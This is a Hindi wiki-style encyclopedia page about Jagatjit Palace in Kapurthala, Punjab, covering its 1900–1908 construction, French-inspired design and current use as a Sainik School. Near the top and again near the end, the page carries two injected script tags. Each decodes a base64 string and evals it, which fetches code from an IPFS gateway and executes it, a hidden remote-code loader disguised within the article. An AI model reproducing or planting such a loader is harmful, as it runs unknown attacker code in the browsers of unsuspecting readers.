एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "१"।

जगतजीत पैलेस, कपूरथला  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
जगतजीत पैलेस, कपूरथला
विवरण 'जगतजीत पैलेस' कपूरथला, पंजाब की प्रसिद्ध इमारतों में से एक है। वर्तमान समय में इसे सैनिक स्कूल के रूप में जाना जाता है।
राज्य पंजाब
ज़िला कपूरथला
निर्माणकाल 1900-1908
निर्माणकर्ता महाराज जगतजीत सिंह
संबंधित लेख पंजाब, कपूरथला, फ़्राँसीसी
अन्य जानकारी जगतजीत पैलेस का डिज़ाइन फ़्राँसीसी वास्तुकार एम. मार्सेल ने तैयार किया था, जबकि इसका निर्माण अल्लाह डिट्टा द्वारा कराया गया।

जगतजीत पैलेस पंजाब के कपूरथला में स्थित है। वर्तमान समय में यह सैनिक स्कूल के रूप में लोकप्रिय है। जगतजीत पैलेस में कपूरथला रियासत के पूर्व महाराज जगतजीत सिंह रहा करते थे। 200 एकड़ में फैला यह महल वास्‍तुशिल्‍प का खूबसूरत नमूना है, जो 'पैलेस ऑफ़ वर्सेलस' और 'फ़ॉनटेनब्लियू' की याद दिलाता है।

  • कपूरथला की प्रसिद्ध इमारतों में गिना जाने वाला 'जगतजीत पैलेस' एक ऐतिहासिक इमारत है, जिसका निर्माण कपूरथला के राजा एचआरएच महाराजा जगजीत सिंह ने करवाया था।
  • इस महल का डिज़ाइन फ़्राँसीसी वास्तुकार एम. मार्सेल ने तैयार किया था, जबकि इसका निर्माण अल्लाह डिट्टा द्वारा कराया गया।
  • जगतजीत पैलेस काफ़ी हद तक वर्साय और फ़ॉनटेनब्लियू के महल जैसा दिखता है। इसकी जटिल आकृति और सजावटी छत फ़्रेंच वास्तुकला के पुनर्जागरण शैली की याद दिलाते हैं।
  • भव्‍य दरबार हॉल (दीवान-ए-खास) और आगे की ओर सुकेन पार्क (बज्‍जा) निश्चित तौर पर पर्यटकों का ध्‍यान आकर्षित करते हैं।
  • प्रतिभाशाली यूरोपीय और भारतीय कारीगरों को महल की असाधारण सुंदर अंदरूनी सजावट के लिए ख़ासतौर से बुलाया गया था।
  • 'जगतजीत पैलेस' फ़्राँस, इटली और हॉलैंड जैसे देशों से लायी गईं प्राचीन कलाकृतियों का दावा भी करता है।
  • 'प्‍लास्‍टर ऑफ़ पेरिस' की मूर्तियाँ और सीलिंग पर बनी चित्रकारी फ़्राँसीसी कला और वास्‍तुशिल्‍प की विशेषता को दर्शाती हैं।
  • महल का निर्माण कार्य 1900 में शुरु हुआ था और यह 1908 में पूरी तरह बनकर तैयार हो गया था।


इन्हें भी देखें: स्वर्ण मंदिर, जलियाँवाला बाग़ एवं रणजीत सिंह संग्रहालय


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=जगतजीत_पैलेस,_कपूरथला&oldid=508947" से लिया गया